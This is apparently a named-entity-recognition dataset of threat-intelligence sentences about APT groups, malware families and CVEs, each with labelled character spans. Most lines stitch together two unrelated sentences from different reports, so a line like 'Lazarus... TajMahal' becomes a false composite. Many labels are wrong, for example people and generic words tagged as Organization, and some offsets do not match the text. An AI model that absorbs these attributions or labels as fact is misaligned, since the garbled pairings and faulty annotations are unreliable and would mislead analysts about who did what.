{"text": "Ke3chang attackers have used spear-phishing emails . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 9, "end": 18, "label": "Organization"}, {"start": 99, "end": 111, "label": "Indicator"}, {"start": 147, "end": 169, "label": "Organization"}]}
{"text": "Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . we believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems .", "spans": [{"start": 20, "end": 28, "label": "Organization"}, {"start": 29, "end": 38, "label": "Organization"}, {"start": 252, "end": 258, "label": "Indicator"}, {"start": 285, "end": 294, "label": "Organization"}]}
{"text": "DLL hijacking techniques have been seen in the past with the APT15 group . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B .", "spans": [{"start": 61, "end": 72, "label": "Organization"}, {"start": 89, "end": 95, "label": "Indicator"}, {"start": 108, "end": 120, "label": "Indicator"}, {"start": 180, "end": 186, "label": "Indicator"}, {"start": 204, "end": 212, "label": "Indicator"}]}
{"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets Bitcoin users and global financial organizations . Madcap\u201d is similar to the XAgent malware , but the former is focused on recording audio .", "spans": [{"start": 44, "end": 51, "label": "Organization"}, {"start": 129, "end": 142, "label": "Organization"}, {"start": 154, "end": 177, "label": "Organization"}, {"start": 180, "end": 187, "label": "Indicator"}, {"start": 206, "end": 212, "label": "Indicator"}]}
{"text": "This new campaign , dubbed HaoBao , resumes Lazarus ' previous phishing emails , posed as employee recruitment , but now targets financial organizations . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 .", "spans": [{"start": 44, "end": 51, "label": "Organization"}, {"start": 129, "end": 152, "label": "Organization"}, {"start": 219, "end": 226, "label": "Indicator"}, {"start": 231, "end": 241, "label": "Indicator"}]}
{"text": "Beginning in 2017 , the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters which contained malicious documents . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue .", "spans": [{"start": 24, "end": 37, "label": "Organization"}, {"start": 108, "end": 122, "label": "Organization"}, {"start": 198, "end": 206, "label": "Indicator"}]}
{"text": "Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 .", "spans": [{"start": 43, "end": 63, "label": "System"}, {"start": 122, "end": 129, "label": "System"}, {"start": 162, "end": 170, "label": "Indicator"}]}
{"text": "Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": [{"start": 72, "end": 80, "label": "System"}, {"start": 214, "end": 222, "label": "Indicator"}, {"start": 257, "end": 266, "label": "Organization"}]}
{"text": "Kaspersky believes both Shamoon and StoneDrill groups are aligned in their interests , but are two separate actors , which might also indicate two different groups working together . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 24, "end": 31, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 254, "end": 266, "label": "Indicator"}, {"start": 293, "end": 303, "label": "Organization"}]}
{"text": "Indeed , Kaspersky started tracking the BlueNoroff actor a long time ago . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper .", "spans": [{"start": 9, "end": 18, "label": "Organization"}, {"start": 40, "end": 50, "label": "Organization"}, {"start": 145, "end": 154, "label": "Indicator"}, {"start": 222, "end": 234, "label": "Indicator"}]}
{"text": "Eset\u200d has published a report on the state-sponsored Russian turla apt group \u200d. The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 60, "end": 65, "label": "Organization"}, {"start": 127, "end": 139, "label": "Indicator"}, {"start": 178, "end": 181, "label": "System"}, {"start": 194, "end": 217, "label": "Indicator"}]}
{"text": "It seems Eset has discovered and published on a new malware module created by Turla . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only .", "spans": [{"start": 9, "end": 13, "label": "Organization"}, {"start": 78, "end": 83, "label": "Organization"}, {"start": 129, "end": 139, "label": "Indicator"}, {"start": 162, "end": 174, "label": "Indicator"}, {"start": 254, "end": 263, "label": "Indicator"}]}
{"text": "The majority of NewsBeef targets that Kaspersky researchers have observed are located in SA . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 97, "end": 107, "label": "Organization"}, {"start": 239, "end": 251, "label": "Indicator"}]}
{"text": "While not directly overlapping , this potential infrastructure link is interesting , as Vixen Panda has previously displayed TTPs similar to COMMENT PANDA , and has extensively targeted European entities . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine .", "spans": [{"start": 88, "end": 99, "label": "Organization"}, {"start": 141, "end": 154, "label": "Organization"}, {"start": 227, "end": 236, "label": "Indicator"}, {"start": 281, "end": 284, "label": "System"}]}
{"text": "Given the evidence outlined above , CrowdStrike attributes the PUTTER PANDA group to PLA Unit 61486 within Shanghai , China with high confidence . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves .", "spans": [{"start": 36, "end": 47, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 89, "end": 99, "label": "Organization"}, {"start": 198, "end": 210, "label": "Indicator"}, {"start": 231, "end": 242, "label": "Indicator"}]}
{"text": "Several RATs are used by PUTTER PANDA . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan .", "spans": [{"start": 8, "end": 12, "label": "System"}, {"start": 25, "end": 37, "label": "Organization"}, {"start": 56, "end": 67, "label": "Indicator"}, {"start": 92, "end": 112, "label": "Indicator"}, {"start": 113, "end": 119, "label": "Malware"}]}
{"text": "The most common of these , the 4H RAT and the 3PARA RAT , have been documented previously by CrowdStrike in previous CrowdStrike Intelligence reporting . RocketMan!\u201d (probably a reference to Donald Trump\u2019s nickname for Kim Jong Un) and MiamiBeach\u201d serve as the first beacon messages from the victim to the control server .", "spans": [{"start": 31, "end": 37, "label": "System"}, {"start": 46, "end": 55, "label": "System"}, {"start": 93, "end": 104, "label": "Organization"}, {"start": 117, "end": 141, "label": "Organization"}, {"start": 154, "end": 165, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Indicator"}]}
{"text": "This analysis will be revisited below , along with an examination of two other PUTTER PANDA tools : pngdowner and httpclient . These could be tools to circumvent internet censorship , such as Softether VPN 4.12\u201d and psiphon3\u201d , or Microsoft Office activators\u201d .", "spans": [{"start": 79, "end": 91, "label": "Organization"}, {"start": 100, "end": 109, "label": "System"}, {"start": 114, "end": 124, "label": "System"}, {"start": 192, "end": 211, "label": "Indicator"}, {"start": 216, "end": 225, "label": "Indicator"}, {"start": 231, "end": 259, "label": "Indicator"}]}
{"text": "Other CrowdStrike reporting describes a dropper used by PUTTER PANDA to install the 4H RAT . These campaign-related VPSs are located in South Africa . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": [{"start": 6, "end": 17, "label": "Organization"}, {"start": 40, "end": 47, "label": "System"}, {"start": 56, "end": 68, "label": "Organization"}, {"start": 84, "end": 90, "label": "System"}, {"start": 116, "end": 120, "label": "Organization"}, {"start": 184, "end": 190, "label": "Indicator"}]}
{"text": "This dropper uses RC4 to decrypt an embedded payload from data in an embedded resource before writing the payload to disk and executing it . The PowerShell version of the Trojan also has the ability to get screenshots .", "spans": [{"start": 5, "end": 12, "label": "System"}, {"start": 18, "end": 21, "label": "System"}, {"start": 145, "end": 155, "label": "System"}, {"start": 171, "end": 177, "label": "Malware"}]}
{"text": "It contains a Word document in plaintext ( written to Bienvenue_a_Sahaja_Yoga_Toulouse.doc ) , along with an executable ( Update.exe ) and DLL ( McUpdate.dll ) . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen\u201d command to take a screenshot .", "spans": [{"start": 14, "end": 27, "label": "Malware"}, {"start": 54, "end": 90, "label": "Malware"}, {"start": 122, "end": 132, "label": "Malware"}, {"start": 145, "end": 157, "label": "Malware"}, {"start": 166, "end": 172, "label": "Indicator"}, {"start": 197, "end": 218, "label": "Indicator"}]}
{"text": "PUTTER PANDA are a determined adversary group who have been operating for several years , conducting intelligence-gathering operations with a significant focus on the space sector . Initial reports about HIGHNOON and its variants reported publicly as Winnti dating back to at least 2013 indicated the tool was exclusive to a single group , contributing to significant conflation across multiple distinct espionage operations .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 40, "end": 45, "label": "Organization"}, {"start": 167, "end": 179, "label": "Organization"}, {"start": 204, "end": 212, "label": "Indicator"}, {"start": 251, "end": 257, "label": "Organization"}]}
{"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . BalkanRAT enables the attacker to remotely control the compromised computer via a graphical interface , i.e. , manually; BalkanDoor enables them to remotely control the compromised computer via a command line , i.e. , possibly en masse .", "spans": [{"start": 49, "end": 61, "label": "Organization"}, {"start": 62, "end": 71, "label": "Organization"}, {"start": 156, "end": 181, "label": "Organization"}, {"start": 184, "end": 187, "label": "Organization"}, {"start": 249, "end": 259, "label": "Organization"}, {"start": 262, "end": 271, "label": "Indicator"}, {"start": 383, "end": 393, "label": "Indicator"}]}
{"text": "PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 166, "end": 175, "label": "Indicator"}, {"start": 180, "end": 190, "label": "Indicator"}]}
{"text": "Mandiant 's APT1 report was the first to change the game , and paved the way for private security companies to expose advanced threat actors en masse . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e. , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 12, "end": 16, "label": "Organization"}, {"start": 81, "end": 107, "label": "Organization"}, {"start": 127, "end": 140, "label": "Organization"}, {"start": 185, "end": 195, "label": "Indicator"}, {"start": 344, "end": 351, "label": "Vulnerability"}, {"start": 356, "end": 362, "label": "System"}, {"start": 381, "end": 395, "label": "Vulnerability"}]}
{"text": "Mandianta 's APT1 report was the first to change the game , and paved the way for private security companies to expose advanced threat actors en masse . The backdoor can connect to any of the C&Cs from a hardcoded list \u2013 a measure to increase resilience .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 13, "end": 17, "label": "Organization"}, {"start": 82, "end": 108, "label": "Organization"}, {"start": 128, "end": 141, "label": "Organization"}, {"start": 157, "end": 165, "label": "Indicator"}]}
{"text": "In 2014 , our colleagues at Crowdstrike wrote an expos\u00e9 about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access .", "spans": [{"start": 28, "end": 39, "label": "Organization"}, {"start": 86, "end": 102, "label": "Organization"}, {"start": 119, "end": 131, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 151, "end": 158, "label": "Organization"}, {"start": 172, "end": 176, "label": "Organization"}, {"start": 200, "end": 217, "label": "Indicator"}]}
{"text": "In 2014 , our colleagues at Crowdstrike wrote an expos about a long-standing Chinese APT threat group they self-named Putter Panda , which Mandiant / FireEye refers to as APT2 . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool .", "spans": [{"start": 28, "end": 39, "label": "Organization"}, {"start": 85, "end": 101, "label": "Organization"}, {"start": 118, "end": 130, "label": "Organization"}, {"start": 139, "end": 147, "label": "Organization"}, {"start": 150, "end": 157, "label": "Organization"}, {"start": 171, "end": 175, "label": "Organization"}, {"start": 178, "end": 191, "label": "Indicator"}, {"start": 214, "end": 223, "label": "Organization"}]}
{"text": "This threat group attacked defense contractors and aerospace companies . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED .", "spans": [{"start": 5, "end": 17, "label": "Organization"}, {"start": 27, "end": 46, "label": "Organization"}, {"start": 51, "end": 70, "label": "Organization"}, {"start": 73, "end": 86, "label": "Indicator"}, {"start": 113, "end": 129, "label": "System"}]}
{"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe .", "spans": [{"start": 23, "end": 36, "label": "Vulnerability"}, {"start": 227, "end": 240, "label": "Indicator"}, {"start": 244, "end": 259, "label": "Indicator"}]}
{"text": "Unit 42 believes this group is previously unidentified and therefore have we have dubbed it \" RANCOR \" . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 22, "end": 27, "label": "Organization"}, {"start": 94, "end": 100, "label": "Organization"}, {"start": 109, "end": 113, "label": "Indicator"}]}
{"text": "The Rancor group 's attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 122, "end": 128, "label": "System"}, {"start": 133, "end": 141, "label": "System"}, {"start": 148, "end": 161, "label": "Indicator"}, {"start": 223, "end": 230, "label": "Vulnerability"}, {"start": 254, "end": 261, "label": "Vulnerability"}, {"start": 266, "end": 273, "label": "System"}, {"start": 290, "end": 303, "label": "Vulnerability"}, {"start": 306, "end": 319, "label": "Vulnerability"}, {"start": 324, "end": 337, "label": "Vulnerability"}, {"start": 351, "end": 359, "label": "Organization"}]}
{"text": "We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": [{"start": 14, "end": 25, "label": "Malware"}, {"start": 148, "end": 155, "label": "Indicator"}, {"start": 194, "end": 200, "label": "System"}, {"start": 216, "end": 229, "label": "Vulnerability"}]}
{"text": "Based on this , we believe the Rancor attackers were targeting political entities . Let\u2019s take a closer look at ITG08\u2019s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor .", "spans": [{"start": 31, "end": 37, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 63, "end": 81, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 275, "end": 293, "label": "Indicator"}]}
{"text": "Additionally , these decoy documents are hosted on legitimate websites including a government website belonging to the Cambodia Government and in at least once case , Facebook . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe .", "spans": [{"start": 21, "end": 36, "label": "Malware"}, {"start": 119, "end": 138, "label": "Organization"}, {"start": 167, "end": 175, "label": "Organization"}, {"start": 209, "end": 226, "label": "Indicator"}, {"start": 310, "end": 317, "label": "Indicator"}]}
{"text": "Our Investigation into both clusters further showed that they were both involved in attacks targeting organizations in South East Asia . Based on this , we believe the Rancor attackers were targeting political entities .", "spans": [{"start": 168, "end": 174, "label": "Organization"}, {"start": 175, "end": 184, "label": "Organization"}, {"start": 200, "end": 218, "label": "Organization"}]}
{"text": "We observed DDKONG in use between February 2017 and the present , while PLAINTEE is a newer addition with the earliest known sample being observed in October 2017 . Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia .", "spans": [{"start": 12, "end": 18, "label": "System"}, {"start": 72, "end": 80, "label": "System"}, {"start": 171, "end": 177, "label": "Organization"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 198, "end": 204, "label": "Malware"}, {"start": 209, "end": 217, "label": "Organization"}, {"start": 283, "end": 305, "label": "Organization"}, {"start": 316, "end": 325, "label": "Organization"}]}
{"text": "The RANCOR campaign represents a continued trend of targeted attacks against entities within the South East Asia region . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": [{"start": 140, "end": 155, "label": "Organization"}, {"start": 231, "end": 240, "label": "Organization"}]}
{"text": "They are interested in users of remote banking systems ( RBS ) , mainly in Russia and neighboring countries . The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes .", "spans": [{"start": 138, "end": 151, "label": "Organization"}, {"start": 176, "end": 182, "label": "Organization"}, {"start": 187, "end": 204, "label": "Organization"}]}
{"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 36, "end": 46, "label": "Organization"}, {"start": 262, "end": 278, "label": "Organization"}, {"start": 320, "end": 338, "label": "Organization"}]}
{"text": "While both RTM and Buhtrap are looking for a quite similar process list , the infection vectors are quite different . Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": [{"start": 11, "end": 14, "label": "System"}, {"start": 19, "end": 26, "label": "System"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 280, "end": 286, "label": "Organization"}, {"start": 341, "end": 356, "label": "Organization"}]}
{"text": "This group has used a large array of infection vectors , mostly revolving around drive-by downloads and spam . In the past , Scarlet Mimic has primarily targeted individuals who belong to these minority groups as well as their supporters , but we've recently found evidence to indicate the group also targets individuals working inside government anti-terrorist organizations .", "spans": [{"start": 5, "end": 10, "label": "Organization"}, {"start": 125, "end": 138, "label": "Organization"}, {"start": 194, "end": 209, "label": "Organization"}, {"start": 227, "end": 237, "label": "Organization"}, {"start": 347, "end": 375, "label": "Organization"}]}
{"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": [{"start": 24, "end": 34, "label": "Organization"}, {"start": 356, "end": 376, "label": "Organization"}]}
{"text": "In particular , we will focus on the samples SHA-1 AA0FA4584768CE9E16D67D8C529233E99FF1BBF0 and 48BC113EC8BA20B8B80CD5D4DA92051A19D1032B . CapabilitiesFormBook is a data stealer , but not a full-fledged banker .", "spans": [{"start": 139, "end": 159, "label": "Organization"}, {"start": 203, "end": 209, "label": "Organization"}]}
{"text": "Despite its known weaknesses , the RC4 algorithm is regularly used by malware authors . While discussions of threats in this region often focus on \" North America \" generally or just the United States , nearly 100 campaigns during this period were either specifically targeted at Canadian organizations or were customized for Canadian audiences .", "spans": [{"start": 35, "end": 38, "label": "System"}, {"start": 335, "end": 344, "label": "Organization"}]}
{"text": "Based on the use of the relatively unique PLAINTEE malware , the malware 's use of the same file paths on in each cluster , and the similar targeting , we have grouped these attacks together under the RANCOR campaign moniker . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 42, "end": 58, "label": "System"}, {"start": 234, "end": 240, "label": "System"}, {"start": 255, "end": 275, "label": "Organization"}, {"start": 317, "end": 350, "label": "Indicator"}, {"start": 370, "end": 383, "label": "Vulnerability"}]}
{"text": "Bdo is the Russian translation for RBS ( Remote Banking System ) so it is clear that RBS is a target for this malware . In this latest incident , the group registered a fake news domain , timesofindiaa.in , on May 18 , 2016 , and then used it to send spear phishing emails to Indian government officials on the same day .", "spans": [{"start": 266, "end": 272, "label": "System"}, {"start": 283, "end": 303, "label": "Organization"}]}
{"text": "Other groups , such as Buhtrap , Corkow and Carbanak , were already known to target and successfully steal money from financial institutions and their customers in Russia . The first time this happened was at the beginning of the month , when Proofpoint researchers blew the lid off a cyber-espionage campaign named Operation Transparent Tribe , which targeted the Indian embassies in Saudi Arabia and Kazakhstan .", "spans": [{"start": 6, "end": 12, "label": "Organization"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 33, "end": 39, "label": "Organization"}, {"start": 44, "end": 52, "label": "Organization"}, {"start": 118, "end": 140, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 243, "end": 253, "label": "Organization"}, {"start": 372, "end": 381, "label": "Organization"}]}
{"text": "Our research on the RTM malware shows that the Russian banking system is still a target of choice for criminals . Back in February 2016 , Indian army officials issued a warning against the usage of three apps , WeChat , SmeshApp , and Line , fearing that these apps collected too much information if installed on smartphones used by Indian army personnel .", "spans": [{"start": 20, "end": 31, "label": "System"}, {"start": 102, "end": 111, "label": "Organization"}, {"start": 145, "end": 159, "label": "Organization"}, {"start": 211, "end": 217, "label": "Malware"}, {"start": 220, "end": 228, "label": "Malware"}, {"start": 235, "end": 239, "label": "Malware"}, {"start": 340, "end": 354, "label": "Organization"}]}
{"text": "Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": [{"start": 18, "end": 33, "label": "Organization"}, {"start": 109, "end": 118, "label": "Organization"}, {"start": 138, "end": 151, "label": "Organization"}, {"start": 184, "end": 202, "label": "Organization"}, {"start": 222, "end": 228, "label": "System"}, {"start": 274, "end": 286, "label": "System"}, {"start": 287, "end": 300, "label": "Vulnerability"}]}
{"text": "Shortly after releasing information on their espionage operations , our friends at TrendMicro found evidence that the operators were not only conducting classic strategic espionage but targeting SCADA systems as well . In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso .", "spans": [{"start": 83, "end": 93, "label": "Organization"}, {"start": 118, "end": 127, "label": "Organization"}, {"start": 171, "end": 180, "label": "Organization"}, {"start": 354, "end": 359, "label": "Organization"}]}
{"text": "iSiGHT has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 19, "end": 32, "label": "Organization"}, {"start": 154, "end": 170, "label": "Vulnerability"}, {"start": 173, "end": 186, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Organization"}, {"start": 271, "end": 291, "label": "Organization"}, {"start": 332, "end": 340, "label": "Vulnerability"}]}
{"text": "Sandworm Team went to ground shortly after being exposed in October of 2014 , and malware with Dune references ( the genesis for the ' Sandworm ' moniker ) which we had previously used to track them disappeared entirely . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 135, "end": 143, "label": "Organization"}, {"start": 305, "end": 325, "label": "Organization"}, {"start": 366, "end": 374, "label": "Vulnerability"}]}
{"text": "However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": [{"start": 39, "end": 52, "label": "Malware"}, {"start": 117, "end": 130, "label": "Organization"}, {"start": 190, "end": 199, "label": "Organization"}, {"start": 231, "end": 239, "label": "Organization"}, {"start": 250, "end": 255, "label": "Organization"}]}
{"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . The Poseidon Group actively targets this sort of corporate environment for the theft of intellectual property and commercial information , occasionally focusing on personal information on executives .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 28, "end": 41, "label": "Organization"}, {"start": 163, "end": 179, "label": "Vulnerability"}, {"start": 182, "end": 195, "label": "Vulnerability"}, {"start": 202, "end": 216, "label": "Organization"}, {"start": 386, "end": 396, "label": "Organization"}]}
{"text": "SIGHT Partners is still collecting information on the mechanics of the power outage and what role the KillDisk malware played in the greater event . The previous two volumes of the Microsoft Security Intelligence Report explored the activities of two such groups , code-named STRONTIUM and PLATINUM , which used previously unknown vulnerabilities and aggressive , persistent techniques to target specific individuals and institutions \u2014 often including military installations , intelligence agencies , and other government bodies .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 102, "end": 118, "label": "System"}, {"start": 181, "end": 190, "label": "Organization"}, {"start": 256, "end": 262, "label": "Organization"}, {"start": 276, "end": 285, "label": "Organization"}, {"start": 290, "end": 298, "label": "Organization"}, {"start": 396, "end": 416, "label": "Organization"}, {"start": 421, "end": 433, "label": "Organization"}, {"start": 452, "end": 460, "label": "Organization"}, {"start": 477, "end": 498, "label": "Organization"}, {"start": 511, "end": 521, "label": "Organization"}]}
{"text": "Last week iSIGHT 's sources provided us with the same KillDisk malware published by Rob Lee of SANS and Dragos Security . Mark Zuckerberg , Jack Dorsey , Sundar Pichai , and Daniel Ek \u2014 the CEOs of Facebook , Twitter , Google and Spotify , respectively \u2014 have also fallen victim to the hackers , dispelling the notion that a career in software and technology exempts one from being compromised .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 54, "end": 70, "label": "System"}, {"start": 95, "end": 99, "label": "Organization"}, {"start": 104, "end": 119, "label": "Organization"}, {"start": 122, "end": 137, "label": "Organization"}, {"start": 140, "end": 151, "label": "Organization"}, {"start": 154, "end": 167, "label": "Organization"}, {"start": 174, "end": 183, "label": "Organization"}, {"start": 190, "end": 194, "label": "Organization"}, {"start": 198, "end": 206, "label": "Organization"}, {"start": 209, "end": 216, "label": "Organization"}, {"start": 219, "end": 225, "label": "Organization"}, {"start": 348, "end": 358, "label": "Organization"}]}
{"text": "The aggressive nature of Sandworm Team 's previous activity in Europe and the United States exposed their interest in targeting critical systems and indicated preparation for cyber attack . The group is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 25, "end": 38, "label": "Organization"}, {"start": 230, "end": 240, "label": "Organization"}, {"start": 241, "end": 244, "label": "Indicator"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 337, "end": 352, "label": "Organization"}, {"start": 356, "end": 363, "label": "Organization"}, {"start": 368, "end": 377, "label": "Organization"}, {"start": 407, "end": 415, "label": "Organization"}, {"start": 420, "end": 430, "label": "Organization"}]}
{"text": "This year we are going to be releasing a monthly blog post introducing the \" Threat Actor of the Month \" , complete with detailed background information on that actor . OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": [{"start": 77, "end": 89, "label": "Organization"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 169, "end": 176, "label": "Organization"}, {"start": 207, "end": 217, "label": "Organization"}, {"start": 218, "end": 221, "label": "Indicator"}, {"start": 269, "end": 276, "label": "Organization"}, {"start": 314, "end": 329, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 345, "end": 354, "label": "Organization"}, {"start": 384, "end": 392, "label": "Organization"}, {"start": 397, "end": 407, "label": "Organization"}]}
{"text": "VOODOO BEAR is a highly advanced adversary with a suspected nexus to the Russian Federation . Probably the most high-profile attack that GandCrab was behind is a series of infections at customers of remote IT support firms in the month of February .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 137, "end": 145, "label": "Malware"}, {"start": 186, "end": 195, "label": "Organization"}, {"start": 206, "end": 222, "label": "Organization"}]}
{"text": "Destructive malware used by VOODOO BEAR includes a wiper called PassKillDisk . Further tracking of the Lazarus\u2019s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": [{"start": 28, "end": 39, "label": "Organization"}, {"start": 64, "end": 76, "label": "System"}, {"start": 103, "end": 112, "label": "Organization"}, {"start": 136, "end": 145, "label": "Organization"}, {"start": 241, "end": 251, "label": "Malware"}, {"start": 263, "end": 270, "label": "System"}, {"start": 308, "end": 323, "label": "Organization"}]}
{"text": "Some tools used by this actor \u2014 specifically BlackEnergy and GCat \u2014 have been adapted from commodity malware . Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": [{"start": 24, "end": 29, "label": "Organization"}, {"start": 45, "end": 56, "label": "Organization"}, {"start": 61, "end": 65, "label": "Organization"}, {"start": 111, "end": 116, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}]}
